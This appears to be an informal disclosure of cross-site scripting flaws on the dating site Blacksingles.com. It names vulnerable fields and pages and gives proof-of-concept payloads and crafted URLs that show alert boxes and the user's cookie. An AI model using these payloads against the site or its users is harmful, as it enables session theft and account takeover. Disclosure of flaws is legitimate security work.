Blacksingles.com
Homepage: http://www.blacksingles.com Affected files Profile input boxes Add a friend input box. list.html view.html reply.html compose.html ------------------------------------------------- XSS vuln with cookie disclosure via the Location box. User data isn't sanatized before generating it here. For a PoC, in your Location, input box below the "Please select your city" option put: <img src=javascript:alert(document.cookie)> Screenshots: http://www.youfucktard.com/xsp/blacksingles1.jpg http://www.youfucktard.com/xsp/blacksingles2.jpg http://www.youfucktard.com/xsp/blacksingles5.jpg When posting in a forum, as well as writing a mail to someone from the forum your location is displayed along with your name/age etc. So the XSS attack can occur here too. ---------------------------------------------------- XSS vuln via Add a friend input box. Data isn't sanatized here either. Screenshots: http://www.youfucktard.com/xsp/blacksingles3.jpg ------------------------------------------------------- list.html XSS vuln: http://connect.blacksingles.com/boards/list.html?b=8";>">">">"><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<'<' Screenshots: http://www.youfucktard.com/xsp/blacksingles4.jpg ------------------------------------------------------ view.html XSS vuln: http://connect.blacksingles.com/boards/view.html?b=8&t=485199";>">">">"><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<'<' ------------------------------------------------------ reply.html XSS vuln: http://connect.blacksingles.com/boards/reply.html?b=8&t=485199&p=485199";>">">">"><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<'<' ---------------------------------------------------- XSS vuln via compose.html. http://connect.blacksingles.com/mail/compose.html?u=admin";>">">">"><IMG%20SRC=javascript:alert('XSS')><"<"<"<"<'<' Screenshots: http://www.youfucktard.com/xsp/blacksingles6.jpg ------------------------------------------------
